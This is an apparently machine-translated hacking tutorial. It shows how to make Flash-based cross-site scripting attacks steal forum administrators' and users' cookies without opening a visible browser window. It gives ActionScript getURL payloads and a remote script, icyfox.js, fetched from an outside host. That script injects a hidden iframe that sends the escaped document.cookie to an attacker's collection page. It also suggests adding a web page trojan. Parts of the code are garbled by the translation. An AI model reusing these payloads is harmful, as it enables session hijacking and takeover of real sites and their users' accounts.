The day before the attack was busy learning WIN32 compilations, have been lazy to write articles, these days like Flash Cross station attack is very fierce, but in the implementation of Flash Cross-site attack when the pop-up IE window is very easy to arouse the suspicion of others, and make Flash Cross station attack failed, it really makes people a little headache, Do you have been looking for the implementation of Flash Cross-site attacks do not eject the IE window method to hide their own attack behavior? Below everyone and I together to solve this moderate problem, let Flash Cross station attack more perfect it!
In general, everyone in the Flash Cross-site attack is to do a flash animation, and in the first frame to jump to other URLs of the Ationscript script functions, as follows:
GetURL (' BLOCKED scriptwindow.open (' http://' address of the Web page used to collect cookies? ') +document cookies) "," "_self" and then put this flash animation in the forum of the signature, post or SMS message, used to get the administrator or user cookies, so that the administrative authority, further opportunistic control of the entire site, and ultimately achieve their own purposes. We can see that this ationscript script is the most important part of the entire Cross station attack! This is the script used in the code to open a love and hate window, so we can only change the script to implement the code to hide or remove the pop-up IE window, in addition to the other way!
GetURL (' BLOCKED scriptwindow.open (' http://' address of the Web page used to collect cookies? ') +document cookies, ' _search ') "," _self ")
Of course, this will open the search panel, but also cause suspicion, but can avoid those who turn off pop-up software to kill! Let's just think of a way to do it!
If it is just said above, I believe many readers want to put me ...
If you have read my article "to create a perfect Internet Explorer Trojan", and you understand the code, you can think of it first!
In that article there is the following code:
Jsurl= "Http://www.godog.y365.com/wodemuma/icyfox.js". Replace (/\//g, '//');
window.open ("file:blocked SCRIPTdocument.all.tags (' SCRIPT ') .src= '" +jsurl+ "'; eval ();", "icyfoxlovelace");
GetURL ("BLOCKED SCRIPTdocument.all.tags" (' SCRIPT ') .src= ' http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js '; eval (); "," _self ")
The contents of Icyfox.js are as follows:
Cookieurl= "http://is used to collect cookies from the Web page address? cookie=" +escape (Document.cookie);
/* here, Escape () is used to encode cookies to prevent some special characters in the cookie * *
Document.body.insertAdjacentHTML (' BeforeEnd ', ' <iframe width=0px height=0px style= ' display:none; "src=" ' + cookieurl+ ' "><\/iframe>");
/* Here used the insertadjacenthtml at the end of the body inserted an invisible frame * *
All right! This flash Cross station attack pop-up IE window problem is solved! Of course, if you want to, in the Icyfox.js add a Web page trojan and so I have nothing to say!
Finally, by the way, it can also be used in other types of Cross-site scripting work hit the Hidden popup ie window! It is much more casual than sending a cookie using the Microsoft.XMLHTTP control, because it will not be sent to the current server as the Microsoft.XMLHTTP control, and the focus is Czy " Using the Microsoft.XMLHTTP control to send cookies "the following sentence is mentioned in the article:
"I used to think of a way to use the insertAdjacentHTML method to inject HTML statements in a Web page. It is possible to send cookies without the IE window, but there are times when IE errors are encountered in actual use. "
With my analysis because there are some special characters in the cookie, and Czy is not properly processed or encoded, it will sometimes encounter ie error in actual use, so the above code I use Escape () to the cookie encoding, After receiving the cookie, please note that use unescape () to decode!